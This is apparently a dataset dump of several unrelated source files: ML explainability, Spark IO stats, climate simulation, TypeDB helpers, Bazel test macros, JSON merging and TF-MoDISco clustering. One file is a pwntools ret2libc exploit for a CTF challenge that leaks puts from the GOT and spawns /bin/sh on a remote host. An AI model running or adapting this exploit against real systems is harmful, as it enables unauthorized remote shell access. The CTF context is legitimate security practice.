labels_lst.append(list(set(int(i) for i in item if -1 < int(i) < len(self._classes))))
labels = labels_lst
return inputs, labels, bboxes
def _unpack_next_element(self, next_element, ifbbox=False):
"""
Unpack a single iteration of dataset.
Args:
next_element (Tuple): a single element iterated from dataset object.
ifbbox (bool): whether to preprocess bboxes in self._transform_data.
Returns:
Tuple, a unified Tuple contains image_data, labels, and bounding boxes.
"""
if len(next_element) == 3:
inputs, labels, bboxes = next_element
elif len(next_element) == 2:
inputs, labels = next_element
bboxes = None
else:
inputs = next_element[0]
labels = [[] for x in inputs]
bboxes = None
inputs, labels, bboxes = self._transform_data(inputs, labels, bboxes, ifbbox)
return inputs, labels, bboxes
@staticmethod
def _make_label_batch(labels):
"""
Unify a List of List of labels to be a 2D Tensor with shape (b, m), where b = len(labels) and m is the max
length of all the rows in labels.
Args:
labels (List[List]): the union labels of a data batch.
Returns:
2D Tensor.
"""
max_len = max([len(l) for l in labels])
batch_labels = np.zeros((len(labels), max_len))
for idx, _ in enumerate(batch_labels):
length = len(labels[idx])
batch_labels[idx, :length] = np.array(labels[idx])
return ms.Tensor(batch_labels, ms.int32)
    def _run_inference(self, dataset, summary, threshold=0.5):
"""
Run inference for the dataset and write the inference related data into summary.
Args:
dataset (`ds`): the parsed dataset
summary (`SummaryRecord`): the summary object to store the data
threshold (float): the threshold for prediction.
Returns:
imageid_labels (dict): a dict that maps image_id and the union of its ground truth and predicted labels.
"""
imageid_labels = {}
ds.config.set_seed(58)
self._count = 0
for j, next_element in enumerate(dataset):
now = time()
inputs, labels, _ = self._unpack_next_element(next_element)
prob = self._model(inputs).asnumpy()
for idx, inp in enumerate(inputs):
gt_labels = labels[idx]
gt_probs = [float(prob[idx][i]) for i in gt_labels]
data_np = _convert_image_format(np.expand_dims(inp.asnumpy(), 0), 'NCHW')
_, _, _, image_string = _make_image(_normalize(data_np))
                predicted_labels = [int(i) for i in (prob[idx] > threshold).nonzero()[0]]
predicted_probs = [float(prob[idx][i]) for i in predicted_labels]
union_labs = list(set(gt_labels + predicted_labels))
imageid_labels[str(self._count)] = union_labs
explain = Explain()
explain.image_id = str(self._count)
explain.image_data = image_string
summary.add_value("explainer", "image", explain)
explain = Explain()
explain.image_id = str(self._count)
explain.ground_truth_label.extend(gt_labels)
explain.inference.ground_truth_prob.extend(gt_probs)
explain.inference.predicted_label.extend(predicted_labels)
explain.inference.predicted_prob.extend(predicted_probs)
summary.add_value("explainer", "inference", explain)
summary.record(1)
self._count += 1
print("Finish running and writing {}-th batch inference data. Time elapsed: {}s".format(j, time() - now))
return imageid_labels
def _run_exp_step(self, next_element, explainer, imageid_labels, summary):
"""
Run the explanation for each step and write explanation results into summary.
Args:
next_element (Tuple): data of one step
explainer (_Attribution): an Attribution object to generate saliency maps.
imageid_labels (dict): a dict that maps the image_id and its union labels.
summary (SummaryRecord): the summary object to store the data
Returns:
List of dict that maps label to its corresponding saliency map.
"""
inputs, labels, _ = self._unpack_next_element(next_element)
count = self._count
unions = []
for _ in range(len(labels)):
unions_labels = imageid_labels[str(count)]
unions.append(unions_labels)
count += 1
batch_unions = self._make_label_batch(unions)
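        # Compute saliency maps for each column of the padded union-label batch,
        # then regroup them per sample and per label before writing to summary.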
saliency_dict_lst = []
batch_saliency_full = []
for i in range(len(batch_unions[0])):
batch_saliency = explainer(inputs, batch_unions[:, i])
batch_saliency_full.append(batch_saliency)
for idx, union in enumerate(unions):
saliency_dict = {}
explain = Explain()
explain.image_id = str(self._count)
for k, lab in enumerate(union):
saliency = batch_saliency_full[k][idx:idx + 1]
saliency_dict[lab] = saliency
saliency_np = _make_rgba(saliency)
_, _, _, saliency_string = _make_image(_normalize(saliency_np))
explanation = explain.explanation.add()
explanation.explain_method = explainer.__class__.__name__
explanation.label = lab
explanation.heatmap = saliency_string
summary.add_value("explainer", "explanation", explain)
summary.record(1)
self._count += 1
saliency_dict_lst.append(saliency_dict)
return saliency_dict_lst
def _run_exp_benchmark_step(self, next_element, explainer, benchmarker, saliency_dict_lst):
"""
Run the explanation and evaluation for each step and write explanation results into summary.
Args:
next_element (Tuple): Data of one step
explainer (`_Attribution`): An Attribution object to generate saliency maps.
            benchmarker (`AttributionMetric`): A benchmark object to evaluate the saliency maps.
            saliency_dict_lst (list[dict]): Per-sample dicts that map each label to its saliency map.
"""
inputs, labels, _ = self._unpack_next_element(next_element)
for idx, inp in enumerate(inputs):
inp = _EXPAND_DIMS(inp, 0)
saliency_dict = saliency_dict_lst[idx]
for label, saliency in saliency_dict.items():
if isinstance(benchmarker, Localization):
_, _, bboxes = self._unpack_next_element(next_element, True)
if label in labels[idx]:
res = benchmarker.evaluate(explainer, inp, targets=label, mask=bboxes[idx][label],
saliency=saliency)
benchmarker.aggregate(res, label)
else:
res = benchmarker.evaluate(explainer, inp, targets=label, saliency=saliency)
benchmarker.aggregate(res, label)
|
the-stack_106_22090
|
import csv
import numpy as np
import sys
import os
from pathlib import Path
from argparse import ArgumentParser
inputBytes = sys.argv[1]
outputBytes = sys.argv[2]
stagesOutputBytes = sys.argv[3]
replicationFactor = sys.argv[4]
outputFile = sys.argv[5]
appNameIndex = 0
nodeNameIndex = 1
executorIdIndex = 2
executorTotalReadKbIndex = 3
executorTotalWriteKbIndex = 4
HdfsTotalReadKbIndex = 5
HdfsTotalWriteKbIndex = 6
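# Each stdin line (apart from the header) is expected to be comma-separated in
# the column order implied by the indices above:
# appName,nodeName,executorId,executorTotalReadKb,executorTotalWriteKb,HdfsTotalReadKb,HdfsTotalWriteKb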
class Executor:
def __init__(self, appName):
self.appName = appName
self.nodeName = ""
self.executorId = 0
self.executorTotalReadKb = 0
self.executorTotalWriteKb = 0
self.HdfsTotalReadKb = 0
self.HdfsTotalWriteKb = 0
def __repr__(self):
return f"""
Executor: {self.executorId},
totalReadKb: {self.totalReadKb()}
totalWriteKb: {self.totalWriteKb()}
totalReadAndWriteKb: {self.totalReadAndWriteKb()}
"""
def totalReadKb(self):
return self.executorTotalReadKb + self.HdfsTotalReadKb
def totalWriteKb(self):
return self.executorTotalWriteKb + self.HdfsTotalWriteKb
def totalReadAndWriteKb(self):
return self.totalReadKb() + self.totalWriteKb()
class IoActivityExperiment:
def __init__(self, appName):
self.appName = appName
self.executors = []
def __repr__(self):
return f"""
IoActivityExperiment: {self.appName},
Number of Executors: {len(self.executors)}
totalReadKb: {self.totalReadKb()}
totalWriteKb: {self.totalWriteKb()}
totalReadAndWriteKb: {self.totalReadAndWriteKb()}
"""
def totalReadKb(self):
return sum([item.totalReadKb() for item in self.executors])
def totalWriteKb(self):
return sum([item.totalWriteKb() for item in self.executors])
def totalReadAndWriteKb(self):
return sum([item.totalReadAndWriteKb() for item in self.executors])
executors = []
header = []
experiment = [];
def getExecutorResultFromLine(input):
    if input.startswith("appName"):
        return
    # rstrip() because of the trailing new line. (e.g., "\n")
    input = input.rstrip().split(",")
    global experiment
    print(input)
    print(input[executorTotalReadKbIndex])
    if experiment is None:
experiment = IoActivityExperiment(input[appNameIndex])
executor = Executor(f"{input[appNameIndex]}")
executor.executorId = int(input[executorIdIndex])
executor.nodeName = input[nodeNameIndex]
executor.executorTotalReadKb= int(input[executorTotalReadKbIndex])
executor.executorTotalWriteKb = int(input[executorTotalWriteKbIndex])
executor.HdfsTotalReadKb = int(input[HdfsTotalReadKbIndex])
executor.HdfsTotalWriteKb = int(input[HdfsTotalWriteKbIndex])
print(executor)
experiment.executors.append(executor)
def writeToOutput(experiment):
# {Path.home()}/results/io-activity/outputPio.csv
fileName = outputFile
file_exists = os.path.isfile(fileName)
with open(fileName, mode='a') as output_file:
headers = ['appName', 'totalReadKb', 'totalWriteKb', 'totalReadAndWriteKb', 'inputBytes', 'outputBytes',
'stagesOutputBytes','replicationFactor']
writer = csv.writer(output_file, delimiter=',')
if not file_exists:
writer.writerow(headers) # file doesn't exist yet, write a header
row = [experiment.appName, experiment.totalReadKb(), experiment.totalWriteKb(),
experiment.totalReadAndWriteKb(), inputBytes, outputBytes, stagesOutputBytes, replicationFactor]
writer.writerow(row)
experiment = None;
for line in sys.stdin:
getExecutorResultFromLine(line)
print(experiment)
writeToOutput(experiment)
|
the-stack_106_22093
|
#!/usr/bin/python3
from pwn import *
binary = ELF('./hello')
context.update(arch='i386',os='linux')
#p = process(binary.path)
#libc = ELF('/lib/i386-linux-gnu/libc.so.6')
p = remote('chall.csivit.com', 30046)
libc = ELF('libc-database/db/libc6-i386_2.23-0ubuntu11.2_amd64.so')
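# Stage 1: overflow the 0x88-byte buffer up to the saved return address, call
# puts@plt with puts@GOT as its argument to leak puts' runtime address, then
# return into main for a second pass.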
payload = 0x88 * b'A'
payload += p32(binary.plt.puts)
payload += p32(binary.sym.main)
payload += p32(binary.got.puts)
p.sendlineafter('name?\n', payload)
p.recvuntil('!\n')
_ = p.recv(4)
puts = u32(_ + (4-len(_))*b'\x00')
log.info('puts: ' + hex(puts))
baselibc = puts - libc.sym.puts
log.info('baselibc: ' + hex(baselibc))
libc.address = baselibc
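# Stage 2: with libc rebased from the leak, overflow again and return into
# execve("/bin/sh", ...), passing libc's environ pointer for the argv/envp slots.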
payload = 0x88 * b'A'
payload += p32(libc.sym.execve)
payload += 4 * b'B'
payload += p32(libc.search(b'/bin/sh').__next__())
payload += p32(libc.sym.environ)
payload += p32(libc.sym.environ)
p.sendlineafter('name?\n', payload)
p.recvuntil('!')
p.interactive()
|
the-stack_106_22095
|
import climt
from sympl import PlotFunctionMonitor
import numpy as np
import matplotlib.pyplot as plt
from datetime import timedelta
def plot_function(fig, state):
fig.set_size_inches(10, 5)
ax = fig.add_subplot(1, 2, 1)
state['air_temperature'].mean(dim='lon').plot.contourf(
ax=ax, levels=16)
ax.set_title('Temperature')
ax = fig.add_subplot(1, 2, 2)
state['eastward_wind'].mean(dim='lon').plot.contourf(
ax=ax, levels=16)
ax.set_title('Zonal Wind')
plt.suptitle('Time: '+str(state['time']))
model_time_step = timedelta(seconds=600)
monitor = PlotFunctionMonitor(plot_function)
grid = climt.get_grid(nx=128, ny=62)
held_suarez = climt.HeldSuarez()
dycore = climt.GFSDynamicalCore([held_suarez])
my_state = climt.get_default_state([dycore], grid_state=grid)
my_state['eastward_wind'].values[:] = np.random.randn(*my_state['eastward_wind'].shape)
for i in range(10000):
diag, output = dycore(my_state, model_time_step)
if (my_state['time'].hour % 2 == 0 and
my_state['time'].minute == 0):
print('max. zonal wind: ', np.amax(my_state['eastward_wind'].values))
monitor.store(my_state)
my_state.update(output)
my_state['time'] += model_time_step
|
the-stack_106_22096
|
#
# Copyright (C) 2021 Vaticle
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
def get_thing_types(tx):
"""
Get all schema types, excluding those for implicit attribute relations and base types
Args:
tx: TypeDB transaction
Returns:
TypeDB types
"""
schema_concepts = tx.query().match("match $x sub thing;")
thing_types = [schema_concept.get('x').get_label().name() for schema_concept in schema_concepts]
[thing_types.remove(el) for el in ['thing', 'relation', 'entity', 'attribute']]
return thing_types
def get_role_types(tx):
"""
    Get all schema roles, excluding those for implicit attribute relations and the base role type
Args:
tx: TypeDB transaction
Returns:
TypeDB roles
"""
schema_concepts = tx.query().match("match $rel sub relation, relates $r;")
role_types = ['has'] + [role.get('r').get_label().name() for role in schema_concepts]
role_types.remove('role')
return role_types
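# Hypothetical usage sketch (client/session setup depends on your TypeDB
# client version):
# with TypeDB.core_client("localhost:1729") as client:
#     with client.session("my_database", SessionType.DATA) as session:
#         with session.transaction(TransactionType.READ) as tx:
#             print(get_thing_types(tx))
#             print(get_role_types(tx))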
|
the-stack_106_22099
|
# Copyright 2020 The IREE Authors
#
# Licensed under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
"""Macros for defining tests that run a module using iree-check-module."""
load("//iree/tools:compilation.bzl", "iree_bytecode_module")
load("//build_tools/bazel:run_binary_test.bzl", "run_binary_test")
ALL_TARGET_BACKENDS_AND_DRIVERS = [
("vmvx", "vmvx"),
("vulkan-spirv", "vulkan"),
("dylib-llvm-aot", "dylib"),
]
def iree_check_test(
name,
src,
target_backend,
driver,
compiler_flags = [],
runner_args = [],
tags = [],
timeout = None,
**kwargs):
"""Creates an iree-check-module test for the specified source file.
Args:
name: name of the generated test.
src: source mlir file containing the module.
target_backend: target backend to compile for.
driver: driver to run the module with.
compiler_flags: additional flags to pass to the compiler. Bytecode translation and backend
flags are passed automatically.
runner_args: additional runner_args to pass to iree-check-module. The driver and input file
are passed automatically.
tags: additional tags to apply to the generated test. A tag "driver=DRIVER" is added
automatically.
timeout: timeout for the generated tests.
**kwargs: any additional attributes to pass to the underlying run_binary_test.
"""
bytecode_module_name = name + "_bytecode_module"
iree_bytecode_module(
name = bytecode_module_name,
src = src,
flags = [
"-iree-mlir-to-vm-bytecode-module",
"-mlir-print-op-on-diagnostic=false",
"-iree-hal-target-backends=%s" % target_backend,
] + compiler_flags,
visibility = ["//visibility:private"],
)
run_binary_test(
name = name,
args = [
"--driver=%s" % driver,
"$(location :%s)" % bytecode_module_name,
] + runner_args,
data = [":%s" % bytecode_module_name],
test_binary = "//iree/tools:iree-check-module",
tags = tags + ["driver=%s" % driver],
timeout = timeout,
**kwargs
)
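# Hypothetical BUILD usage of iree_check_test (single source, single backend/driver pair):
# iree_check_test(
#     name = "check_vmvx_simple_mul",
#     src = "simple_mul.mlir",
#     target_backend = "vmvx",
#     driver = "vmvx",
# )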
def iree_check_single_backend_test_suite(
name,
srcs,
target_backend,
driver,
compiler_flags = [],
runner_args = [],
tags = [],
timeout = None,
**kwargs):
"""Creates a test suite of iree-check-module tests for a single backend/driver pair.
One test is generated per source file.
Args:
name: name of the generated test suite.
srcs: source mlir files containing the module.
target_backend: target backend to compile for.
driver: driver to run the module with.
compiler_flags: additional flags to pass to the compiler. Bytecode translation and backend
flags are passed automatically.
runner_args: additional runner_args to pass to the underlying iree-check-module tests. The
driver and input file are passed automatically. To use different runner_args per test,
create a separate suite or iree_check_test.
tags: tags to apply to the generated tests. Note that as in standard test suites, manual
is treated specially and will also apply to the test suite itself.
timeout: timeout for the generated tests.
**kwargs: any additional attributes to pass to the underlying tests and test suite.
"""
tests = []
for src in srcs:
test_name = "_".join([name, src])
iree_check_test(
name = test_name,
src = src,
target_backend = target_backend,
driver = driver,
compiler_flags = compiler_flags,
runner_args = runner_args,
tags = tags,
timeout = timeout,
**kwargs
)
tests.append(test_name)
native.test_suite(
name = name,
tests = tests,
# Note that only the manual tag really has any effect here. Others are
# used for test suite filtering, but all tests are passed the same tags.
tags = tags,
# If there are kwargs that need to be passed here which only apply to
# the generated tests and not to test_suite, they should be extracted
# into separate named arguments.
**kwargs
)
def iree_check_test_suite(
name,
srcs,
target_backends_and_drivers = ALL_TARGET_BACKENDS_AND_DRIVERS,
compiler_flags = [],
runner_args = [],
tags = [],
**kwargs):
"""Creates a test suite of iree-check-module tests.
One test is generated per source file and backend/driver.
Args:
name: name of the generated test suite.
srcs: source mlir files containing the module.
target_backends_and_drivers: backend/driver pairs to compile and run the module, respectively.
compiler_flags: additional flags to pass to the compiler. Bytecode translation and backend
flags are passed automatically.
runner_args: additional runner_args to pass to the underlying iree-check-module tests. The
driver and input file are passed automatically. To use different runner_args per test,
create a separate suite or iree_check_test.
tags: tags to apply to the generated tests. Note that as in standard test suites, manual
is treated specially and will also apply to the test suite itself.
**kwargs: any additional attributes to pass to the underlying tests and test suite.
"""
# We could have complicated argument override logic for runner_args and such, or... the client
# could just create a test suite. The latter seems simpler and more readable.
tests = []
for backend, driver in target_backends_and_drivers:
suite_name = "_".join([name, backend, driver])
iree_check_single_backend_test_suite(
name = suite_name,
srcs = srcs,
driver = driver,
target_backend = backend,
compiler_flags = compiler_flags,
runner_args = runner_args,
tags = tags,
**kwargs
)
tests.append(suite_name)
native.test_suite(
name = name,
tests = tests,
# Note that only the manual tag really has any effect here. Others are
# used for test suite filtering, but all tests are passed the same tags.
tags = tags,
# If there are kwargs that need to be passed here which only apply to
# the generated tests and not to test_suite, they should be extracted
# into separate named arguments.
**kwargs
)
|
the-stack_106_22100
|
import json
import sys
from os.path import abspath
def join_jsons(fin_path1, fin_path2, fout_path, with_dup=False):
final = list()
with open(fin_path1, 'r', encoding="utf8") as f:
final = json.load(f)
print(f"First JSONL contains {len(final)} rows")
tmp = list()
    with open(fin_path2, 'r', encoding="utf8") as f:
tmp = json.load(f)
print(f"Second JSONL contains {len(tmp)} rows")
final.extend(tmp)
    if not with_dup:
final = [dict(tupleized) for tupleized in set(tuple(item.items()) for item in final)]
with open(fout_path, 'w', encoding="utf8") as f:
json.dump(final, f)
print(f"Final JSONL contains {len(final)} rows and has been created in {abspath(fout_path)}")
def print_usage():
print("Usage:\n\tpython join_json.py in_json1 in_json2 out_json [ -d | --dup ]")
if __name__ == "__main__":
with_duplicates = False
if len(sys.argv) < 4:
print_usage()
exit(10)
if len(sys.argv) == 5:
if sys.argv[4] == "-d" or sys.argv[4] == '--dup':
with_duplicates = True
else:
print_usage()
exit(10)
fin_path1 = sys.argv[1]
fin_path2 = sys.argv[2]
fout_path = sys.argv[3]
join_jsons(fin_path1, fin_path2, fout_path, with_duplicates)
|
the-stack_106_22102
|
"""
A batch processing script that calls main_lc.py with the same set of parameters
but different split ids.
"""
import warnings
warnings.filterwarnings('ignore')
import os
import sys
from pathlib import Path
import argparse
from glob import glob
import numpy as np
# from joblib import Parallel, delayed
fdir = Path(__file__).resolve().parent
import main_lc
def run_split_fly(n_splits, rout, *args):
""" Generate split on the fly. """
print('Calling run_split_fly ...')
main_lc.main([ '--n_splits', str(n_splits), '--rout', 'run_'+str(rout), *args ])
parser = argparse.ArgumentParser()
parser.add_argument('-ns', '--n_splits',
default=10,
type=int,
help='Use a subset of splits (default: 10).')
args, other_args = parser.parse_known_args()
print(args)
main_fn = run_split_fly
splits_arr = [1 for _ in range(args.n_splits)]
runs_arr = np.arange(args.n_splits)
n_splits = args.n_splits
# Main execution
for s, r in zip( splits_arr[:n_splits], runs_arr[:n_splits] ):
print(f'Processing split {s}')
other_args_run = other_args.copy()
main_fn(s, r, *other_args_run) # only one split for every run
print('Done.')
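# Example invocation (hypothetical script name; all unrecognized arguments are
# forwarded unchanged to main_lc.py for every split):
# python batch_lc.py -ns 5 [additional main_lc.py arguments]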
|
the-stack_106_22103
|
from __future__ import division, absolute_import, print_function
from .. import affinitymat
from .. import nearest_neighbors
from .. import cluster
from .. import aggregator
from .. import core
from .. import util
from .. import seqlet_embedding
from .. import pattern_filterer as pattern_filterer_module
from joblib import Parallel, delayed
from collections import defaultdict, OrderedDict, Counter
import numpy as np
import time
import sys
import gc
import json
from ..util import print_memory_use
def get_seqlet_neighbors_with_initcluster(
nearest_neighbors_to_compute,
coarse_affmat, initclusters):
if (initclusters is not None):
assert len(initclusters)==len(coarse_affmat)
#get the argsort for coarse_affmat
coarse_affmat_argsort = np.argsort(-coarse_affmat, axis=-1)
nearest_neighbors = []
for row_idx,argsort_row in enumerate(coarse_affmat_argsort):
combined_neighbor_row = []
neighbor_row_topnn = argsort_row[:nearest_neighbors_to_compute+1]
neighbor_set_topnn = set(neighbor_row_topnn)
#combined_neighbor_row ends up being the union of the standard nearest
# neighbors plus the nearest neighbors if focusing on the initclusters
combined_neighbor_row.extend(neighbor_row_topnn)
if (initclusters is not None):
combined_neighbor_row.extend([
y for y in ([x for x in argsort_row
if initclusters[x]==initclusters[row_idx]][
:nearest_neighbors_to_compute+1])
if y not in neighbor_set_topnn])
nearest_neighbors.append(combined_neighbor_row)
return nearest_neighbors
def fish_out_kwargs(orig_kwargs, to_fish_out):
fished_out = {}
for kwarg_name in to_fish_out:
if kwarg_name in orig_kwargs:
fished_out[kwarg_name] = orig_kwargs[kwarg_name]
del orig_kwargs[kwarg_name]
return fished_out
#adds backwards compatibility re gapped kmer arguments
def legacy_tfmodiscoseqletstopatternsfactory(current_constructor):
def new_constructor(*args, **kwargs):
gapped_kmer_kwargs = fish_out_kwargs(
orig_kwargs=kwargs,
to_fish_out=['kmer_len', 'num_gaps',
'num_mismatches', 'gpu_batch_size'])
if (len(gapped_kmer_kwargs) > 0):
assert 'embedder_factory' not in kwargs,\
("Cannot both specify embedder_factory and "
+str(gapped_kmer_kwargs))
from modisco.seqlet_embedding import gapped_kmer
kwargs['embedder_factory'] = (
seqlet_embedding.gapped_kmer
.GappedKmerEmbedderFactory(**gapped_kmer_kwargs))
return current_constructor(*args, **kwargs)
return new_constructor
##legacy
#alphabet_size=None,
#kmer_len=None, num_gaps=3, num_mismatches=2,
#gpu_batch_size=20,
class TfModiscoSeqletsToPatternsFactory(object):
@legacy_tfmodiscoseqletstopatternsfactory
def __init__(self, n_cores=4,
min_overlap_while_sliding=0.7,
#init clusterer factory
initclusterer_factory=None,
embedder_factory=(
seqlet_embedding.advanced_gapped_kmer
.AdvancedGappedKmerEmbedderFactory()),
nearest_neighbors_to_compute=500,
affmat_correlation_threshold=0.15,
filter_beyond_first_round=False,
skip_fine_grained=False,
tsne_perplexity=10,
use_louvain=False,
louvain_initclusters_weight=1.0,
n_leiden_iterations_r1=-1,
n_leiden_iterations_r2=-1,
louvain_num_runs_and_levels_r1=[(200,-1)],
louvain_num_runs_and_levels_r2=[(200,-1)],
contin_runs_r1=50,
contin_runs_r2=50,
final_louvain_level_to_return=1,
frac_support_to_trim_to=0.2,
min_num_to_trim_to=30,
trim_to_window_size=30,
initial_flank_to_add=10,
prob_and_pertrack_sim_merge_thresholds=[
(0.8,0.8), (0.5, 0.85), (0.2, 0.9)],
prob_and_pertrack_sim_dealbreaker_thresholds=[
(0.4, 0.75), (0.2,0.8), (0.1, 0.85), (0.0,0.9)],
subcluster_perplexity=50,
merging_max_seqlets_subsample=300,
#threshold_for_spurious_merge_detection=0.8,
#min_similarity_for_seqlet_assignment=0.2,
final_min_cluster_size=30,
min_ic_in_window=0.6,#total IC in some windowsize window
min_ic_windowsize=6,
ppm_pseudocount=0.001,
final_flank_to_add=0,
verbose=True, seed=1234):
self.initclusterer_factory = initclusterer_factory
if (use_louvain==True):
assert self.initclusterer_factory==None,\
("Louvain doesn't support cluster initialization;"
+" set use_louvain to False")
#affinity_mat calculation
self.n_cores = n_cores
self.min_overlap_while_sliding = min_overlap_while_sliding
self.embedder_factory = embedder_factory
self.nearest_neighbors_to_compute = nearest_neighbors_to_compute
self.affmat_correlation_threshold = affmat_correlation_threshold
self.filter_beyond_first_round = filter_beyond_first_round
self.skip_fine_grained = skip_fine_grained
#affinity mat to tsne dist mat setting
self.tsne_perplexity = tsne_perplexity
#clustering settings
self.use_louvain = use_louvain
self.louvain_initclusters_weight = louvain_initclusters_weight
self.n_leiden_iterations_r1 = n_leiden_iterations_r1
self.n_leiden_iterations_r2 = n_leiden_iterations_r2
self.contin_runs_r1 = contin_runs_r1
self.contin_runs_r2 = contin_runs_r2
self.louvain_num_runs_and_levels_r1 = louvain_num_runs_and_levels_r1
self.louvain_num_runs_and_levels_r2 = louvain_num_runs_and_levels_r2
self.final_louvain_level_to_return = final_louvain_level_to_return
#postprocessor1 settings
self.frac_support_to_trim_to = frac_support_to_trim_to
self.min_num_to_trim_to = min_num_to_trim_to
self.trim_to_window_size = trim_to_window_size
self.initial_flank_to_add = initial_flank_to_add
#subclustering
self.subcluster_perplexity=subcluster_perplexity
#merging similar patterns
self.prob_and_pertrack_sim_merge_thresholds =\
prob_and_pertrack_sim_merge_thresholds
self.prob_and_pertrack_sim_dealbreaker_thresholds =\
prob_and_pertrack_sim_dealbreaker_thresholds
self.merging_max_seqlets_subsample = merging_max_seqlets_subsample
#self.threshold_for_spurious_merge_detection =\
# threshold_for_spurious_merge_detection
#reassignment settings
#self.min_similarity_for_seqlet_assignment =\
# min_similarity_for_seqlet_assignment
self.final_min_cluster_size = final_min_cluster_size
self.min_ic_in_window = min_ic_in_window
self.min_ic_windowsize = min_ic_windowsize
self.ppm_pseudocount = ppm_pseudocount
#final postprocessor settings
self.final_flank_to_add=final_flank_to_add
#other settings
self.verbose = verbose
self.seed = seed
def get_jsonable_config(self):
to_return = OrderedDict([
('class_name', type(self).__name__),
('n_cores', self.n_cores),
            ('initclusterer_factory',
              self.initclusterer_factory.get_jsonable_config()
              if self.initclusterer_factory is not None else None),
('min_overlap_while_sliding', self.min_overlap_while_sliding),
('embedder_factory',
self.embedder_factory.get_jsonable_config()),
('nearest_neighbors_to_compute',
self.nearest_neighbors_to_compute),
('affmat_correlation_threshold',
self.affmat_correlation_threshold),
            ('filter_beyond_first_round', self.filter_beyond_first_round),
('tsne_perplexity', self.tsne_perplexity),
('use_louvain', self.use_louvain),
('louvain_num_runs_and_levels_r1',
self.louvain_num_runs_and_levels_r1),
('louvain_num_runs_and_levels_r2',
self.louvain_num_runs_and_levels_r2),
('final_louvain_level_to_return',
self.final_louvain_level_to_return),
('contin_runs_r1',
self.contin_runs_r1),
('contin_runs_r2',
self.contin_runs_r2),
('frac_support_to_trim_to', self.frac_support_to_trim_to),
('min_num_to_trim_to', self.min_num_to_trim_to),
('trim_to_window_size', self.trim_to_window_size),
('initial_flank_to_add', self.initial_flank_to_add),
('subcluster_perplexity', self.subcluster_perplexity),
('prob_and_pertrack_sim_merge_thresholds',
self.prob_and_pertrack_sim_merge_thresholds),
('prob_and_pertrack_sim_dealbreaker_thresholds',
self.prob_and_pertrack_sim_dealbreaker_thresholds),
('merging_max_seqlets_subsample',
self.merging_max_seqlets_subsample),
#('threshold_for_spurious_merge_detection',
# self.threshold_for_spurious_merge_detection),
('final_min_cluster_size', self.final_min_cluster_size),
('min_ic_in_window', self.min_ic_in_window),
('min_ic_windowsize', self.min_ic_windowsize),
('ppm_pseudocount', self.ppm_pseudocount),
('final_flank_to_add', self.final_flank_to_add),
])
return to_return
def __call__(self, track_set, onehot_track_name,
contrib_scores_track_names,
hypothetical_contribs_track_names,
track_signs,
other_comparison_track_names=[]):
bg_freq = np.mean(
track_set.track_name_to_data_track[onehot_track_name].fwd_tracks,
axis=(0,1))
assert len(bg_freq.shape)==1
assert len(track_signs)==len(hypothetical_contribs_track_names)
assert len(track_signs)==len(contrib_scores_track_names)
seqlets_sorter = (lambda arr:
sorted(arr,
key=lambda x:
-np.sum([np.sum(np.abs(x[track_name].fwd))
for track_name
in contrib_scores_track_names])))
if (self.initclusterer_factory is not None):
self.initclusterer_factory.set_onehot_track_name(onehot_track_name)
initclusterer_factory = self.initclusterer_factory
pattern_comparison_settings =\
affinitymat.core.PatternComparisonSettings(
track_names=hypothetical_contribs_track_names
+contrib_scores_track_names
+other_comparison_track_names,
track_transformer=affinitymat.L1Normalizer(),
min_overlap=self.min_overlap_while_sliding)
#coarse_grained 1d embedder
seqlets_to_1d_embedder = self.embedder_factory(
onehot_track_name=onehot_track_name,
toscore_track_names_and_signs=list(
zip(hypothetical_contribs_track_names,
[np.sign(x) for x in track_signs])),
n_jobs=self.n_cores)
#affinity matrix from embeddings
coarse_affmat_computer =\
affinitymat.core.SparseAffmatFromFwdAndRevSeqletEmbeddings(
seqlets_to_1d_embedder=seqlets_to_1d_embedder,
sparse_affmat_from_fwdnrev1dvecs=\
affinitymat.core.SparseNumpyCosineSimFromFwdAndRevOneDVecs(
n_neighbors=self.nearest_neighbors_to_compute,
verbose=self.verbose),
verbose=self.verbose)
affmat_from_seqlets_with_nn_pairs =\
affinitymat.core.AffmatFromSeqletsWithNNpairs(
pattern_comparison_settings=pattern_comparison_settings,
sim_metric_on_nn_pairs=\
affinitymat.core.ParallelCpuCrossMetricOnNNpairs(
n_cores=self.n_cores,
cross_metric_single_region=
affinitymat.core.CrossContinJaccardSingleRegion()))
filter_mask_from_correlation =\
affinitymat.core.FilterMaskFromCorrelation(
correlation_threshold=self.affmat_correlation_threshold,
verbose=self.verbose)
aff_to_dist_mat = affinitymat.transformers.AffToDistViaInvLogistic()
#density_adapted_affmat_transformer =\
# affinitymat.transformers.NNTsneConditionalProbs(
# perplexity=self.tsne_perplexity,
# aff_to_dist_mat=aff_to_dist_mat)
#prepare the clusterers for the different rounds
# No longer a need for symmetrization because am symmetrizing by
# taking the geometric mean elsewhere
affmat_transformer_r1 =\
affinitymat.transformers.AdhocAffMatTransformer(lambda x: x)
#affinitymat.transformers.SymmetrizeByAddition(
# probability_normalize=True)
print("TfModiscoSeqletsToPatternsFactory: seed=%d" % self.seed)
if (self.use_louvain):
for n_runs, level_to_return in self.louvain_num_runs_and_levels_r1:
affmat_transformer_r1 = affmat_transformer_r1.chain(
affinitymat.transformers.LouvainMembershipAverage(
n_runs=n_runs,
level_to_return=level_to_return,
parallel_threads=self.n_cores, seed=self.seed))
clusterer_r1 = cluster.core.LouvainCluster(
level_to_return=self.final_louvain_level_to_return,
affmat_transformer=affmat_transformer_r1,
contin_runs=self.contin_runs_r1,
verbose=self.verbose, seed=self.seed)
else:
clusterer_r1 = cluster.core.LeidenClusterParallel(
n_jobs=self.n_cores,
affmat_transformer=affmat_transformer_r1,
numseedstotry=self.contin_runs_r1,
n_leiden_iterations=self.n_leiden_iterations_r1,
verbose=self.verbose)
#No longer a need for symmetrization because am symmetrizing by
# taking the geometric mean elsewhere
affmat_transformer_r2 =\
affinitymat.transformers.AdhocAffMatTransformer(lambda x: x)
